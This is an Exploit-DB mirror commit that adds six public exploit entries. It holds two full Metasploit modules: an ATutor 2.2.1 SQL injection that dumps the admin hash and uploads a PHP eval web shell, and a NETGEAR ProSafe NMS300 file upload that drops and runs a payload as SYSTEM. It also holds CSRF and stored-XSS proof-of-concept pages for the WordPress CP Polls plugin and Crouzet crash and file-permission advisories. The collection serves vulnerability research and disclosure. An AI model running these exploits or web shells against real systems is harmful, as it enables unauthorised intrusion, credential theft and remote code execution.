bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-03-02

Browse source 
6 new exploits
This commit is contained in:
Offensive Security 2016-03-02 05:02:47 +00:00
parent a4526e0949
commit 7f6ad99482
7 changed files with 857 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -35747,3 +35747,9 @@ id,file,description,date,author,platform,type,port
39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80
39507,platforms/php/webapps/39507.txt,"WordPress More Fields <= 2.1 Plugin - CSRF Vulnerability",2016-02-29,"Aatif Shahdad",php,webapps,80
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus SHFolder.DLL - Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - .pm4 Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0
39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80
39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080

Can't render this file because it is too large.

338
platforms/php/remote/39514.rb Executable file
View file

@ -0,0 +1,338 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution',
'Description' => %q{
This module exploits a SQL Injection vulnerability and an authentication weakness
vulnerability in ATutor. This essentially means an attacker can bypass authenication
and reach the administrators interface where they can upload malcious code.
You are required to login to the target to reach the SQL Injection, however this
can be done as a student account and remote registration is enabled by default.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code
],
'References' =>
[
[ 'CVE', '2016-2555' ],
[ 'URL', 'http://www.atutor.ca/' ] # Official Website
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Mar 1 2016',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
OptString.new('USERNAME', [true, 'The username to authenticate as']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
],self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def check
# the only way to test if the target is vuln
begin
test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
if test_injection(test_cookie)
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def create_zip_file
zip_file = Rex::Zip::Archive.new
@header = Rex::Text.rand_text_alpha_upper(4)
@payload_name = Rex::Text.rand_text_alpha_lower(4)
@plugin_name = Rex::Text.rand_text_alpha_lower(3)
path = "#{@plugin_name}/#{@payload_name}.php"
register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}")
zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
zip_file.pack
end
def exec_code
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
})
end
def upload_shell(cookie)
post_data = Rex::MIME::Message.new
post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie,
'agent' => 'Mozilla'
})
if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla',
})
if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
'cookie' => cookie,
'agent' => 'Mozilla',
})
return true
end
end
# auth failed if we land here, bail
fail_with(Failure::Unknown, "Unable to upload php code")
return false
end
def get_hashed_password(token, password, bypass)
if bypass
return Rex::Text.sha1(password + token)
else
return Rex::Text.sha1(Rex::Text.sha1(password) + token)
end
end
def login(username, password, bypass)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "login.php"),
'agent' => 'Mozilla',
})
token = $1 if res.body =~ /\) \+ \"(.*)\"\);/
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
if bypass
password = get_hashed_password(token, password, true)
else
password = get_hashed_password(token, password, false)
end
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "login.php"),
'vars_post' => {
'form_password_hidden' => password,
'form_login' => username,
'submit' => 'Login'
},
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/
# this is what happens when no state is maintained by the http client
if res && res.code == 302
if res.redirection.to_s.include?('bounce.php?course=0')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
return cookie
end
else res.redirection.to_s.include?('admin/index.php')
# if we made it here, we are admin
return cookie
end
end
# auth failed if we land here, bail
fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
return nil
end
def perform_request(sqli, cookie)
# the search requires a minimum of 3 chars
sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='"
rand_key = Rex::Text.rand_text_alpha(1)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"),
'vars_post' => {
"search_friends_#{rand_key}" => sqli,
'rand_key' => rand_key,
'search' => 'Search People'
},
'cookie' => cookie,
'agent' => 'Mozilla'
})
return res.body
end
def dump_the_hash(cookie)
extracted_hash = ""
sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i
for i in 1..login_and_hash_length
sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))"
asciival = generate_sql_and_test(false, false, sqli, cookie)
if asciival >= 0
extracted_hash << asciival.chr
end
end
return extracted_hash.split(":")
end
def get_ascii_value(sql, cookie)
lower = 0
upper = 126
while lower < upper
mid = (lower + upper) / 2
sqli = "#{sql}>#{mid}"
result = perform_request(sqli, cookie)
if result =~ /There are \d entries./
lower = mid + 1
else
upper = mid
end
end
if lower > 0 and lower < 126
value = lower
else
sqli = "#{sql}=#{lower}"
result = perform_request(sqli, cookie)
if result =~ /There are \d entries./
value = lower
end
end
return value
end
def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
if do_test
if do_true
result = perform_request("1=1", cookie)
if result =~ /There are \d entries./
return true
end
else not do_true
result = perform_request("1=2", cookie)
if not result =~ /There are \d entries./
return true
end
end
elsif not do_test and sql
return get_ascii_value(sql, cookie)
end
end
def test_injection(cookie)
if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie)
if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie)
return true
end
end
return false
end
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: fullname,
post_reference_name: self.refname,
private_data: opts[:password],
origin_type: :service,
private_type: :password,
username: opts[:user]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
last_attempted_at: Time.now
}.merge(service_data)
create_credential_login(login_data)
end
def exploit
student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
print_status("Dumping username and password hash...")
# we got admin hash now
credz = dump_the_hash(student_cookie)
print_good("Got the #{credz[0]} hash: #{credz[1]} !")
if credz
admin_cookie = login(credz[0], credz[1], true)
print_status("Logged in as #{credz[0]}, uploading shell...")
# install a plugin
if upload_shell(admin_cookie)
print_good("Shell upload successful!")
# boom
exec_code
end
end
end
end

188
platforms/php/webapps/39513.txt Executable file
View file

@ -0,0 +1,188 @@
# Exploit Title: WordPress CP Polls 1.0.8 - CSRF - Update poll settings & Persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
=============
Description
=============
With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.
The Polls can have dependant questions, this means that some questions are displayed depending of the
selection made on other questions.
(copy of README.txt)
===================
Technical details
===================
CP Polls plugin for wordpress is vulnerable to Persistent Cross-site scripting is not sanitizing the
values of the options before savinng to database. This issue can be exploited by an attacker with
CSRF by sending a malicious link to a wordpress administrator. If administrator clicks the link, the
action will be executed because there isn't CSRF protection.
=========================
Proof of Concept (html)
=========================
<html>
<!-- CSRF PoC - Burp Suite i0 SecLab plugin -->
<!-- We can find the Poll id into the source code of a post with a cp poll and looking for ´CP_Polls_id´.
We can find something like: <input type="hidden" name="CP_Polls_id" value="4" />
4 is the Poll's id, now we have the id and we can make a csrf attack.
-->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:80/wordpress/wp-admin/options-general.php?page=CP_Polls&cal=1", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "CP_Polls_post_options=1&CP_Polls_id= [ Poll id to update! ]&poll_limit=2&poll_private_reports=false&poll_see_results=true&poll_text_seeres= [PERSISTENT CODE INJECT HERE] &poll_text_private=s&poll_text_votes=votes&fp_return_page=&form_structure=%5B%5B%7B%22form_identifier%22%3A%22%22%2C%22name%22%3A%22fieldname1%22%2C%22shortlabel%22%3A%22%22%2C%22index%22%3A0%2C%22ftype%22%3A%22fradio%22%2C%22userhelp%22%3A%22%22%2C%22userhelpTooltip%22%3Afalse%2C%22csslayout%22%3A%22%22%2C%22title%22%3A%22Select+a+Choice%22%2C%22layout%22%3A%22one_column%22%2C%22required%22%3Atrue%2C%22choiceSelected%22%3A%22%22%2C%22showDep%22%3Afalse%2C%22choices%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesVal%22%3A%5B%22First+Choice%22%2C%22Second+Choice%22%2C%22Third+Choice%22%5D%2C%22choicesDep%22%3A%5B%5B%5D%2C%5B%5D%2C%5B%5D%5D%2C%22fBuild%22%3A%7B%7D%7D%5D%2C%5B%7B%22title%22%3A%22 [PERSISTENT CODE INJECT HERE] %22%2C%22description%22%3A%22 [PERSISTENT CODE INJECT HERE] %22%2C%22formlayout%22%3A%22top_aligned%22%2C%22formtemplate%22%3A%22%22%7D%5D%5D&vs_text_submitbtn= [PERSISTENT CODE INJECT HERE] &vs_text_previousbtn=Previous&vs_text_nextbtn=Next&vs_use_validation=true&vs_text_is_required=This+field+is+required.&cv_text_enter_valid_captcha= [PERSISTENT CODE INJECT HERE] .&vs_text_is_email=Please+enter+a+valid+email+address.&vs_text_datemmddyyyy=Please+enter+a+valid+date+with+this+format%28mm%2Fdd%2Fyyyy%29&vs_text_dateddmmyyyy=Please+enter+a+valid+date+with+this+format%28dd%2Fmm%2Fyyyy%29&vs_text_number=Please+enter+a+valid+number.&vs_text_digits=Please+enter+only+digits.&vs_text_max=Please+enter+a+value+less+than+or+equal+to+%7B0%7D.&vs_text_min=Please+enter+a+value+greater+than+or+equal+to+%7B0%7D.&fp_emailfrommethod=fixed&fp_from_email=admin%40localhost.com&fp_destination_emails=admin%40localhost.com&fp_subject=Contact+from+the+blog...&fp_inc_additional_info=true&fp_emailformat=text&fp_message=The+following+contact+message+has+been+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0A&cu_enable_copy_to_user=false&cu_subject=Confirmation%3A+Message+received...&cu_emailformat=text&cu_message=Thank+you+for+your+message.+We+will+reply+you+as+soon+as+possible.%0D%0A%0D%0AThis+is+a+copy+of+the+data+sent%3A%0D%0A%0D%0A%3C%25INFO%25%3E%0D%0A%0D%0ABest+Regards.&cv_enable_captcha=false&cv_width=170&cv_height=60&cv_chars=5&cv_min_font_size=25&cv_max_font_size=35&cv_noise=200&cv_noise_length=4&cv_background=ffffff&cv_border=000000&cv_font=font-1.ttf&rep_enable=no&rep_days=1&rep_hour=0&rep_emails=&rep_subject=as&rep_emailformat=text&rep_message=Attached+you+will+find+the+data+from+the+form+submissions.&submit=Save+Changes";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
################################################################################
# Exploit Title: WordPress CP Polls 1.0.8 - Reflected file download (.bat file)
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
# Demo: https://www.youtube.com/watch?v=uc6P59BPEkU
===================
Technical details
===================
CP Polls plugin for wordpress is prone to file download issue. A hacker is able to attack an administrator by
exploiting a CSRF in the 'change cp poll name' converting the downloadable report file (csv) to a malicious .bat file.
Because there is not restriction in the cp poll name the CSRF exploit can change the name to ...
malicious.bat;
The semicolon (;) character must be restricted because the header 'Content-Disposition' uses this characteer as a
parameter delimitation. For example, when we change the name of a cp poll to 'malicious.bat;' when an administrator
download the report (thinking that is a csv file) the response header turns:
""
Content-Disposition: attachment; file=malicious.bat;.csv
""
the csv is ignored and the administrator gets a .BAT file
So, how to exploit this vulnerability to execute commands on the victim's machine?
Whe have an option. If the cp_poll is added in a post we can vote them and we can inject our malicious payload
into a votation.
==============================
Proof of Concept CSRF (html)
==============================
https://www.youtube.com/watch?v=uc6P59BPEkU
==========================
If the csrf attack is succesful, we only need to inject our commands in votations. In ´fieldnames´ post parameter
we can inject our commands.
################################################################################
# Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
===================
Technical details
===================
CP Polls plugin for wordpress is prone to persistent XSS via cross-site file upload.
When we register an cp_poll, it is sanitized correctly but when we upload a CSV file, we can
bypass the protection and inject malicious HTML/Javascript.
There are not CSRF protection in that action so it can be exploited with a CSRF attack by sending a
malicious link to a victim (administrator) a wait for execution of the malicious request.
=========================
Proof of Concept (html)
=========================
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name=\"importfile\"; filename=\"csv.csv\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>,
\"<img src=x onerror=alert('I am scared!')>\", \"sample subject\", \"\"\r\n" +
"-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name=\"pbuttonimport\"\r\n" +
"\r\n" +
"Import\r\n" +
"-----------------------------17460754011784--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
========
TIMELINE
========
2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclousure

60
platforms/windows/dos/39509.txt Executable file
View file

@ -0,0 +1,60 @@

Crouzet em4 soft 1.1.04 Integer Division By Zero
Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: 1.1.04 and 1.1.03.01
Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.
Desc: em4 soft suffers from a division by zero attack when handling
Crouzet Logic Software Document '.pm4' files, resulting in denial
of service vulnerability and possibly loss of data.
---------------------------------------------------------------------
(187c.1534): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image013b0000
*** ERROR: Module load completed but symbols could not be loaded for image013b0000
eax=00000000 ebx=00000000 ecx=55c37c10 edx=00000000 esi=0105b13c edi=0110bb18
eip=013ea575 esp=0064d8b8 ebp=0064d8f4 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
image013b0000+0x3a575:
013ea575 f7bf18010000 idiv eax,dword ptr [edi+118h] ds:002b:0110bc30=00000000
0:000> u
image013b0000+0x3a575:
013ea575 f7bf18010000 idiv eax,dword ptr [edi+118h]
013ea57b 8d4de0 lea ecx,[ebp-20h]
013ea57e c745fc00000000 mov dword ptr [ebp-4],0
013ea585 50 push eax
013ea586 6808505b01 push offset image013b0000+0x205008 (015b5008)
013ea58b 51 push ecx
013ea58c ff15b0575a01 call dword ptr [image013b0000+0x1f57b0 (015a57b0)]
013ea592 8b870c010000 mov eax,dword ptr [edi+10Ch]
---------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5309
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5309.php
25.01.2016
--
PoC:
http://zeroscience.mk/codes/poc5309.pm4.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39509.zip

15
platforms/windows/dos/39512.txt Executable file
View file

@ -0,0 +1,15 @@
# Exploit Title: Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs
# Date: 01-03-2016
# Exploit Author: Shantanu Khandelwal Twitter: @shantanu561993 <shantanu561993@gmail.com>
# Vendor Homepage: http://www.viscomsoft.com/
# Software Link: http://www.viscomsoft.com/downloads/calendar.html
# Version: 2.0
# Tested on: Windows XP IE-8 , Windows 7 IE-8
Multiple Vulnerabilities found in calender.ocx file
Multiple Access violations
POC:
https://www.dropbox.com/s/rtakkmw9ru55lbn/CALENDARLib.zip?dl=0
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39512.zip

107
platforms/windows/local/39510.txt Executable file
View file

@ -0,0 +1,107 @@

Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 Insecure File Permissions
Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: em4 soft (1.1.04 and 1.1.03.01)
M3 soft (3.1.2.0)
Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.
Millenium 3 (M3) is easy to program and to implement, it enables
the control and monitoring of machines and automation installations
with up to 50 I/O. It is positioned right at the heart of the
Crouzet Automation range.
Desc: em4 soft and M3 soft suffers from an elevation of privileges
vulnerability which can be used by a simple authenticated user that can
change the executable file with a binary of choice. The vulnerability
exist due to the improper permissions, with the 'C' flag (Change) for
'Everyone' group.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5310
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5310.php
25.01.2016
--
C:\Program Files (x86)\Crouzet automation>cacls "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet automation>cd "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft>cacls *.exe
C:\Program Files (x86)\Crouzet automation\em4 soft\em4 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft>
================================================================================================
C:\Program Files (x86)\Crouzet Automatismes>cacls "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3 Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet Automatismes>cd "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>cacls *.exe
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\M3 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>

143
platforms/windows/remote/39515.rb Executable file
View file

@ -0,0 +1,143 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
'Description' => %q{
Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
The application has a file upload vulnerability that can be exploited by an
unauthenticated remote attacker to execute code as the SYSTEM user.
Two servlets are vulnerable, FileUploadController (located at
/lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
1.1.0.13.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-1525'],
['US-CERT-VU', '777024'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
],
'DefaultOptions' => { 'WfsDelay' => 5 },
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => true,
'Targets' =>
[
[ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 4 2016'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, "Application path", '/'])
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
'method' => 'GET'
})
if res && res.code == 405
Exploit::CheckCode::Detected
else
Exploit::CheckCode::Safe
end
end
def generate_jsp_payload
exe = generate_payload_exe
base64_exe = Rex::Text.encode_base64(exe)
payload_name = rand_text_alpha(rand(6)+3)
var_raw = 'a' + rand_text_alpha(rand(8) + 3)
var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
var_buf = 'c' + rand_text_alpha(rand(8) + 3)
var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
var_tmp = 'e' + rand_text_alpha(rand(8) + 3)
var_path = 'f' + rand_text_alpha(rand(8) + 3)
var_proc2 = 'e' + rand_text_alpha(rand(8) + 3)
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
String #{var_path} = #{var_tmp}.getAbsolutePath();
BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
} catch (Exception e) {
}
%>
|
jsp.gsub!(/[\n\t\r]/, '')
return jsp
end
def exploit
jsp_payload = generate_jsp_payload
jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
jsp_full_name = "null#{jsp_name}.jsp"
post_data = Rex::MIME::Message.new
post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
post_data.add_part(jsp_payload,
"application/octet-stream", 'binary',
"form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
data = post_data.to_s
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
print_status("#{peer} - Payload uploaded successfully")
else
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name),
'method' => 'GET'
})
handler
end
end